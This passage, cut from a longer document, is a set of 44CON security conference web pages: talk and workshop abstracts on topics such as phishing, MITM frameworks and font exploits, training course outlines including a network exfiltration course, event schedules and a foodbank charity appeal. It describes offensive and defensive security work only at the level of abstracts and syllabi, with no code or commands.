          Richo will walk attendees through the basic architecture of a traditional AOT compiler and runtime loader, and describe the parallels between this and the operation of a modern bytecode VM (python, ruby, etc). With this newfound knowledge, we’ll tackle implementing a tool to reverse engineer a sample of obfuscated ruby. However, instead of analyzing the bytecode directly, we will instead implement a malicious, but otherwise fully functional VM, and use that to explore the various anti-analysis tricks deployed.

          By the end of the talk, you will have extended insight into the conceptual inner workings of a compiler, and feel equipped to implement substitutes for the interesting parts of a traditional compilation/loader pipeline to trick opaque objects into telling you how they work, instead of the other way around. While the demos will focus on ruby, the techniques demonstrated are equally applicable to python, etc.


          MITMf: Bringing Man-In-The-Middle attacks to the 21’st century

          Presented By: Marcello Salvati

          Tired of managing countless scripts for automating your Man-In-The-Middle attacks?

          Have a cool idea for a MITM attack, but don’t want to spend hours writing a script from scratch?

          Tired of bashing your head against the wall trying to figure out why Ettercap’s filters are not working?

          Well look no further!

          MITMf combines new and old MITM techniques into a framework! Written in Python, it’s built to be extremely extendible and reliable, while updating the current MITM attacks for the 21st century!


          Dark Fairytales from a Phisherman (Vol.II)

          Presented By: Michele Orru

          Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real “bad guy” may do to attack an organisation.

          Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

          Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We’ll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.


          Reverse engineering and exploiting font rasterizers: the OpenType saga

          Presented By: Mateusz Jurczyk

          Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

          Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

          The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80’s and 90’s and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.


          15-Minute Linux Incident Response Live Analysis

          Presented By: Philip Polstra

          This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly make a determination as to whether or not an incident has occurred without the need to shut down the system to perform traditional dead analysis.

          Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

          Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.


          A Trek to the Emerald City: Ring -1 Based AV

          Presented By: Shift

          To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

          The attack surface of AV software has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like Ring which allows controlling the Virtualization Extensions our CPUs employ.

          This talk takes us into the realm of Hypervisor based AVs, to see how well they’ve managed to walk in the depths of Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits.


          Get in the Ring0 – Understanding Windows drivers

          Presented By: Graham Sutherland

          Separate your IRPs from your IRQLs, people, it’s time to learn about Windows drivers. Turns out they’re not magic. Who knew?


          Going AUTH the Rails on a Crazy Train

          Presented By: Tomek Rabczak & Jeff Jarmoc

          Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it’s up to the developers to keep themselves safe. In this talk, we take a look at patterns that we’ve seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails.


          Responsible disclosure: who cares?

          Presented By: OJ Reeves & Dan Tentler

          Both OJ and Dan have been conducting security assessments for years. Occasionally a discovery is made which warrants discreetly contacting the vendor in question to let them know several thousand (or million) of their devices have a major vulnerability. Sometimes the vendor takes notice and subsequently takes action, however sadly on most occasions they either feign effort, completely ignore the researcher, or openly say ‘go away’. These are a couple stories of how responsible disclosure was attempted, but the company in question couldn’t be troubled to help themselves.

          Dan will articulate the story of events surrounding the recent goatse-ing of a sign in Atlanta, Georgia. LED billboards are apparently just like every other “IoT” style device – completely open, completely public, you just have to know where to look. A little shodanning and one can find any number of colorful things on the internet. Dan will tell the story about his attempts to notify this sign company shortly before they got goatse’d, their interactions before and after and the demeanor in which one can conduct oneself when going about turning a security disclosure into a conference talk. We will check live on stage to see how many of these things still exist, as well.

          OJ will tell a horrible tale of his first ever disclosure experience, one that involved a very large vendor of consumer storage products. The story consists of initial vulnerability discovery, analysis, and exploitation, and then leads into what seemed like an endless back-and-forth with the vendor over a series of months. There were lows, and there were highs. The former outnumbered the latter. There was much derp! All will be shared in its lulzy glory, in gory detail, up to and including a discussion with the vendor’s CSO. The story will end with an opinion. A strong one. OJ will also be trawling shodan to show how many boxes are still vuln. He will be going through the exploit step by step and explaining how things were discovered.


          Software Defined Networking (SDN) Security

          Presented By: David Jorm

          SDN is rapidly moving from R&D to production deployment, with some frightening security implications. This presentation will provide an overview of emerging SDN technologies, the attack surfaces they expose, and the kinds of vulnerabilities that have already been discovered in popular SDN controllers. A live demo of several exploits will show the potential security implications of deploying SDN in production today. Finally we will look at some efforts currently underway to improve the security of SDN controllers.


          Forging the USB armory

          Presented By: Andrea Barisani

          The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kinds of embedded systems.

          The presentation illustrates the journey that we have taken to develop an open hardware board, the first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

          The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, are meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

          The presentation explores the lessons learned in making a small form factor, high specifications, embedded device with solely open source tools, its architecture and security features such as secure boot and ARM TrustZone implementation.

          The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

          The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.


          Stegosploit – Drive-by Browser Exploits using only Images

          Presented By: Saumil Shah

          “A good exploit is one that is delivered with style”.

          Stegosploit creates a new way to encode “drive-by” browser exploits and deliver them through image files. These payloads are undetectable using current means. This paper discusses two broad underlying techniques used for image based exploit delivery – Steganography and Polyglots. Drive-by browser exploits are steganographically encoded into JPG and PNG images. The resultant image file is fused with HTML and Javascript decoder code, turning it into an HTML+Image polyglot. The polyglot looks and feels like an image, but is decoded and triggered in a victim’s browser when loaded.


          44CON LONDON 2015 Workshops

          Most of these workshops are now available to view on Vimeo.

          Some of the following workshops have specific requirements for items that attendees should bring along; full details can be found on the requirements page.

          Indicators of Compromise: From malware analysis to eradication

          Presented By: Michael Boman

          This workshop takes you through the steps from locating an unknown malware sample inside the corporate network, to analyzing the sample to identify the indicators of compromise, to using those indicators to eradicate the malware from the enterprise network using freely available tools – some that you might already have deployed.

          Introduction to Reverse Engineering C++

          Presented By: Angel M. Villegas

          C++ and Object Oriented Programming (OOP) have been around for a while. Software (small to large scale projects) and malware are leveraging C++ and OOP more and more. Understanding how to program and reverse engineer C++ can aid in finding or exploiting vulnerabilities, performing in-depth analysis on malware, hacking games, etc.

          Requirements

          Hands-on JTAG for fun and root shells

          Presented By: Joe FitzPatrick

          JTAG may be almost 30 years old with little change, but that doesn’t mean most people really understand what it does and how. This workshop will start with a brief introduction to what JTAG really is, then quickly dive into some hands-on practice with finding, wiring, and finally exploiting a system via JTAG.

          For this UK-themed workshop, we’ll target a Raspberry Pi (Cambridge) with an ARM (also Cambridge) microprocessor. In order to interact with the system, we’ll use a JTAG interface cable from FTDI (Glasgow). We won’t do any hardware modifications, but we will hook up wires in weird and wonderful ways to make the Raspberry Pi do things it otherwise shouldn’t.

          Analyzing Malicious Office Documents

          Presented By: Didier Stevens

          In this workshop (2 hours), I explain how to use the tools (oledump, emldump, YARA rules, …) I developed to analyze (malicious) Microsoft Office documents.

          I have around 20 exercises that explain step by step to the workshop participants how they can analyze malicious office documents with my Python tools. Microsoft Office is not required for the analysis.

          Old Dog, New Tricks: Forensics With PowerShell

          Presented By: Jared Atkinson

          Recent intrusions into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection, but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

          In this workshop, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.

          Pen Test Partners IoT Workshop

          Presented By: Dave Lodge

          We are constantly expanding and sharing our understanding of the Internet of Things and generally discovering that it is really quite broken. It’s easy to put remote controlled chipsets into everyday appliances and gadgets and manage their data in the cloud, but where are the safeguards and security frameworks? We have researched many app enabled “things” from kids toys to sex toys and kettles and every single one was found wanting. While the findings are fun, the implications are not. We’ll show you how they can create serious security headaches, from giving up Wi-Fi PSKs to being used as network implants.

          The workshop will start with a brief slot covering our research to date with Fitbit’s Aria scales; what we’ve found, what we’ve learned, where we’ve got stuck, and what we’ve guessed at. We will discuss a few vulnerabilities that we have discovered and help get you started on finding some more. Once we’ve set the scene the workshop can begin. This is really a 101 on logic probing and hardware analysis, so we’ll share some basic techniques for logic probing; UART, SPI, Flash etc.

          #####EOF##### 44CON Training Goes Quarterly – 44CON

          44CON Training Goes Quarterly

          We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused courses on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

          That’s right, you no longer have to wait a year to sit a high quality training course!

          Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

          Mastering Container Security – Rory McCune, NCC Group
          Malware Reverse Engineering – Joxean Koret

          Both courses are two days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

          If you’d like to offer a high-end course in London, get in touch.

          #####EOF##### charity – 44CON

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

          #####EOF##### Network Forensics: A blog post by Erik Hjelmvik – 44CON

          Network Forensics: A blog post by Erik Hjelmvik

          I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past 10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

          I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

          The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

          You can find more details about the training here.

          #####EOF##### What To Expect On Thursday Night – 44CON

          What To Expect On Thursday Night

          44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

          If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

          First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complimentary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

          The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

          Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

          Looking for something more blue team than red? From 20:00, Philippe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack, is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

          While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

          • Best billed idea
          • Most lame duck pitch
          • Most quackers concept

          Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

          If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

          Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature, either in part or in whole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

          #####EOF##### 44CONnect March Week – What to expect – 44CON

          44CONnect March Week – What to expect

          We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

          Monday 11th March – Training

          Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

          Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

          Tuesday 12th March – Training

          Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

          Wednesday 13th March – 44CONnect

          If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

          Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

          10:00 – Rory McCune – Container Security
          11:00 – Owen Shearing & Will Hunt – Exploiting in.security
          12:00 – Lightning talk round for attendees
          12:30 – Lunch (included for training attendees only)
          14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
          15:00 – Dave Ryan – Reporting is dead. Long live reporting.

          From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on Twitter around 16:00 and he’ll let you know where to go.

          Thursday 14th March – CRESTCon

          We’re really excited about CRESTCon. 5 lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

          As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

          CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.

          #####EOF##### About 44CON – 44CON

          About 44CON

          What is 44CON?

          44CON is an Information Security Conference & Training event taking place in London, designed to provide something for the business and technical Information Security professional.

          Why do 44CON?

          To bring the best in international Security training + speaking (as well as the best of local talent) to the UK at a reasonable cost.

          44CON is located in London, which allows for a wide variety of security professionals to attend from the UK, Europe and further afield.

          At the bigger conferences, getting time with top class security speakers is limited. At 44CON, you have great access to speakers, who are all willing to spend time and talk about their work. This is where interesting partnerships can occur.

          Don’t just take our word for it, check out what others have said about the conference on our media coverage page.

          Who’s behind it?

          Sense/Net Ltd is the company that holds the IP for 44CON. Sense/Net is an events management company set up by Adrian and Steve to run conferences and events. Our flagship conference, 44CON, is a public event bringing together the best in UK and International information security research and networking opportunities. If you would like an internal conference for your organisation, or have a requirement for a bespoke event, please contact us to discuss your requirement and how we can help.

          #####EOF##### Web App Hacker’s Handbook: Live Edition – 44CON

          Web App Hacker’s Handbook: Live Edition

          Presented By: Marcus Pinto and Aaron Devaney, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          The 2 day course will take place on the 10th & 11th September 2019 at the Novotel London West.
          Cost is £1,300 (inc VAT). Buy your place in our shop now.

          Course Outline

          The course follows the contents of WAHH, with a strong focus on practical techniques:

          • Overview of web application security (chapters 1-3)
          • Mapping the application and its attack surface (chapter 4)
          • Bypassing client-side controls (chapter 5)
          • Attacking core security mechanisms: authentication, session handling, access controls (chapters 6-8)
          • Using automation to enhance manual testing (chapter 13)
          • Injecting code and other input-based attacks (chapters 9-10)
          • Attacking application logic (chapter 11)
          • Attacking other users (chapter 12)

          We will cover a huge range of attacks and techniques, focusing on arming you up with methods and capability to target the vast cocktail of technologies and situations:

          • Injection techniques and methodology to target any language (XXE, SQL, LDAP, JavaScript)
          • Writing Burp Extensions, Burp Macros and other tips to automate your work further and test ‘untestable’ web apps
          • Exploiting seemingly “low risk” issues to achieve full application compromise
          • Understanding JWT, SAML, and API testing
          • Turning theoretical attacks into practical exploits
          • The latest attack techniques which have been developed in recent months
          • And much more …

          The course employs a range of demo applications and lab exercises, containing hundreds of different examples of web application vulnerabilities.

          This course itself is CREST approved and listed as helpful towards CCT APP.

          Student Requirements

          Delegates should be able to meet the following:

          • Familiarity using an intercepting proxy
          • Understanding of basic concepts such as the HTTP protocol, session management, and basic HTML.
          • Computers capable of running Burp Suite (www.portswigger.net). Note that attendees should have administrative access on these machines in order to set IP addresses, modify hosts files and install software.

          What to Bring

          • A version of the JRE, capable of running Burp Suite.
          • An Ethernet connection.
          • Administrative access to the laptop, and the ability to install a few tools, and disable personal firewalls or virus scanners should they get in the way of the lab exercises.

          We strongly recommend a personal laptop – if your corporate laptop build is too restrictive this may affect your ability to participate in the course fully.

          About the Trainer

          Marcus Pinto is internationally recognised as a leader in the application and database security field, having spent the last nine years in Information Security both as a consultant and as an end user responsible for a global team securing over 200 build tracks and 50+ externally facing applications. He has delivered training to some of the most high-profile audiences, at 44CON, BlackHat, SyScan, and Hack in the Box. Privately he has run training for many technical audiences including CESG’s penetration testing team.

          Marcus also sat on the assessors panel providing input for the CREST Web Application Exam, the UK’s number one certification for application assessment.

          Book your 44CON 2019 training course now!

          #####EOF##### Cloud Security and DevSecOps Workshop – 44CON

          Cloud Security and DevSecOps Workshop

          Presented By: Paul Schwarzenberger

          Public cloud services are now mainstream, and growing at a massive rate, as organisations launch new applications in the cloud and migrate existing systems. Along with the rapid move to the cloud, there is an equally revolutionary shift to DevOps, infrastructure as code, and adoption of agile software development approaches.

          Taken together, broad access to public cloud services, combined with the dynamic nature of DevOps, introduces a multitude of new risks, methods of attack and potential security issues.

          This course provides a hands-on introduction to cloud security and DevSecOps, covering new attack vectors and risks, common mistakes and misconfigurations. Methods of protecting applications and data in the cloud are explored, ranging from secure cloud architectures, to security tests integrated into continuous integration pipelines, cloud security services, continuous cloud compliance, and automated cloud security operations.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Knowledge of AWS and Azure services, secure architectures and best practice
          • Hands-on experience of AWS and Azure security features and services
          • Understanding DevSecOps approaches, technologies and tools
          • Practical use of CI/CD pipelines incorporating security testing
          • Container and serverless architectures, security issues and controls

          Course Outline

          Day 1:

          • Introduction and cloud concepts
          • AWS core services
          • AWS lab – build serverless web site using CloudFormation template
          • AWS security services
          • Azure core services
          • Azure lab – deploy infrastructure and implement security improvements

          Day 2:

          • Azure security services
          • Continuous compliance and automated assessment tools
          • Continuous compliance lab – assess security of an AWS account
          • Container concepts, architectures and container security
          • Serverless architectures, serverless functions, security risks and best practice
          • DevOps and DevSecOps
          • DevSecOps lab – CI/CD pipeline for serverless application with integrated tests

          Target Audience

          Security engineers, security architects, security operations and DevOps looking to develop their understanding of cloud security and DevSecOps with a view to designing secure systems, preventing attacks, detecting security issues and establishing automated remediation.

          Penetration testers, ethical hackers and red team personnel interested in extending their knowledge of cloud security risks and issues, common misconfigurations which can be exploited, and the use of automated tools to assess security of cloud infrastructure and applications.

          Student Requirements

          No particular experience is required; however, any knowledge of cloud will be beneficial.

          What to Bring

          • Laptop with Amazon Workspaces client installed (see below)
          • Mobile phone (for authenticator app)

          Software Requirements

          Before coming on the course, download and install the Amazon Workspaces client on your laptop from https://clients.amazonworkspaces.com/.

          After installing, open the application while connected to home WiFi or a mobile network. Press the Network status symbol at the bottom right hand corner to view detailed status. Ensure that all items have a green tick as shown in the screenshots below.

           

           

           

           

           

           

           

          Also please install the Google Authenticator app on your smartphone.

          Students will be provided with

          • Amazon Workspaces virtual desktops for the labs, with all necessary software and tools preinstalled
          • AWS, Azure and GitHub credentials to be used responsibly during the course
          • Electronic copies of the course presentations, electronic and paper copies of lab guides

          About the Trainer

          Instructor – Paul Schwarzenberger @paulschwarzen

          Paul is a cloud security architect and DevSecOps specialist with over 15 years’ experience leading a wide range of security related engagements for customers across sectors including financial services, pharmaceutical, retail, education and media, logistics, UK Government and Police.

          Paul uses an agile DevSecOps approach to lead the implementation and migration of critical systems to public cloud, with demanding security and compliance requirements for protection of personal data, detection and prevention of cyber-attacks and financial fraud.

          Recent conference presentations include:

          • Security BSides London 2018 – How to take over a production system in the cloud
          • DevSecCon London 2018 – A journey to continuous cloud compliance
          • IISP CrestCON 2018 – Why cloud security is different

          Paul has numerous security qualifications, certifications and memberships including MSc Information Security Royal Holloway, M.Inst.ISP, CCSP, CISSP and AWS Certified Security Specialty.

          Book your 44CON June 2019 training course now!

          #####EOF##### In & Out – The Network Data Exfiltration Techniques Training – 44CON

          In & Out – The Network Data Exfiltration Techniques Training

          Presented By: Leszek Miś

          The In&Out Network Exfiltration Techniques training class has been designed to present students with the modern and emerging tools and techniques available for network data exfiltration, testing and bypassing DLP/IDS/IPS/FW systems, protocol tunneling, hiding, pivoting and generating malicious network events. Highly technical content and a hands-on-only practical approach guarantee that using this transferred knowledge and these technologies in real production environments will be easy, smooth and repeatable.

          As an introduction, we will cover the latest APT-style campaigns using malware samples, analyze the top C2 network communication techniques seen in the wild and map the findings directly to the ATT&CK Framework, kill chain methodology and defense in depth strategy. We will also go briefly (with live examples OFC!) through the importance of network baselining, memory forensics, automated malware analysis systems and finally the real threat simulation tactics which are the key aspects of this training.

          Next, we will deep dive into the individual network protocols, services and techniques commonly in use by adversaries in corporate networks and discuss the characteristic security detection features. Using the available set of tools (more than 50 different tools and frameworks – check the Keywords section list below), the student will play one by one with well prepared exfiltration, pivoting and tunneling use-cases to generate the true network symptoms of modern attacker behavior.

          This 3 day course will take place on the 9th, 10th and 11th of September 2019 in London.
          The price is £1,950 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Run different types of TCP/UDP reverse and bind shells across Windows and Linux systems, pivot to the next subnets, configure port forwarding & proxying and find out what network traffic artifacts such actions leave
          • Manually generate malicious packets, e.g. to saturate a DHCP server using Python, flood the network service from C code or start a BF by using hydra or medusa
          • Generate your own malicious payloads and raw TCP/UDP custom encrypted traffic channels undetectable by security products
          • Simulate DNS DGA traffic, run DNS TXT tunnels and remote shells, exfiltrate data using DNS MX and learn how to gain the Internet connection on the plane or in the hotel for free!
          • Clone, armor and phish popular websites
          • Big file ICMP packet dripping covert channel and monitor ICMP traffic
          • Use different HTTP headers and methods for stealing data with combination of web application injection techniques and walk through the world of webshells
          • Detect and understand TLS/SSL-based anomalies and exfiltration methods
          • Run Powershell scripts in post-exploitation stage for leaking the data and bypass AV/EDR
          • Cheat security platforms by running internal WMI, Websockets, VOIP or P2P covert channels
          • Hide stolen data in binary file, WAV file, Image file or exfiltrate data from air-gapped system using hops
          • Configure the station to connect to anonymizers like external VPN, TOR, Open proxy and ‘ping’ to the IP/domains tagged on globally recognized security feeds, rules or phishy lists
          • Use popular cloud-based services for C2 communication and data stealing, ex. Pastebin, Twitter, AWS and many more
          • Replay malicious PCAP files and in terms of network behaviour and analyze the malware samples using Cuckoo
          • The syntax of signature-based rules works, how Suricata or Bro IDS can help you detect adversary tactics and what are the differences between this two IDS engines
          • And many, many more.

          Course Outline

          1. Introduction
          2. Modern RAT’s implementation and popular APT&C2 malware communication design – real use cases
          3. TCP/UDP bind and reverse shells
          4. General bypassing, exfiltration, tunneling, pivoting, proxying and C2 techniques
          5. Cloud-based exfiltration and C2 channels
          6. Windows & Powershell exfiltration tools
          7. Browser Exfiltration
          8. Hopping from air-gapped networks
          9. USB attacks and network exfiltration combo
          10. The art of data hiding → steganography examples
          11. Signature-based event analytics, rule bypassing & malicious network traffic generation
          12. Adversary simulation moves, actions, tools & automated platforms

          Target Audience

          • Red and Blue team members
          • Security / Data Analytics
          • CIRT / Incident Response Specialists
          • Network Security Engineers
          • SOC members and SIEM Engineers
          • AI / Machine Learning Developers
          • Chief Security Officers and IT Security Directors

          Student Requirements

          • An intermediate level of command line syntax experience using Linux and Windows
          • Fundamental knowledge of TCP/IP network protocols
